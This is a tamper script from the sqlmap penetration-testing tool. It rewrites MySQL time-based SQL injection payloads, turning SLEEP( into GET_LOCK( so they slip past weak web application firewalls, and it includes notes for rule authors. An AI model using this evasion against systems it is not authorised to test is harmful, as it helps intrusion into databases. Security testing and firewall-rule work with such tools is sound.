sqlmapproject
GitHub Repository: sqlmapproject/sqlmap
Path: blob/master/tamper/sleep2getlock.py
#!/usr/bin/env python
"""
Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
See the file 'LICENSE' for copying permission
"""
from lib.core.data import kb
from lib.core.enums import PRIORITY
# Priority value exported for sqlmap's tamper loader; HIGHEST presumably places
# this script ahead of lower-priority tampers when several are used - confirm in the loader.
__priority__ = PRIORITY.HIGHEST
def dependencies():
    """
    Prerequisite hook of this tamper script; it declares nothing

    No check is run and no warning is emitted here, so the MySQL
    requirement listed in tamper()'s docstring is not enforced by this
    function.
    """

    return None
def tamper(payload, **kwargs):
    """
    Replaces instances like 'SLEEP(5)' with (e.g.) "GET_LOCK('ETgP',5)"

    Requirement:
        * MySQL

    Tested against:
        * MySQL 5.0 and 5.5

    Notes:
        * Useful to bypass very weak and bespoke web application firewalls
          that filter the SLEEP() and BENCHMARK() functions
        * Only the literal, upper-case token "SLEEP(" is rewritten; a
          BENCHMARK( call in the payload is passed through unchanged
        * GET_LOCK()'s second argument is a lock-wait timeout, not an
          unconditional delay, so the two calls are not strictly equivalent
        * For rule authors: a filter keyed on the SLEEP/BENCHMARK names does
          not match the rewritten payload; coverage of time-based SQL
          injection has to include lock functions such as GET_LOCK, and the
          durable fix is parameterized queries rather than name filtering
        * Reference: https://zhuanlan.zhihu.com/p/35245598

    >>> tamper('SLEEP(5)') == "GET_LOCK('%s',5)" % kb.aliasName
    True
    """

    # Empty or None payloads are handed back untouched
    if not payload:
        return payload

    # kb.aliasName supplies the lock name (presumably a per-run alias - confirm in lib.core.data)
    lock_prefix = "GET_LOCK('%s'," % kb.aliasName

    # Plain, case-sensitive substring replacement: the argument and closing
    # parenthesis of the original SLEEP(...) carry over as GET_LOCK's timeout
    return payload.replace("SLEEP(", lock_prefix)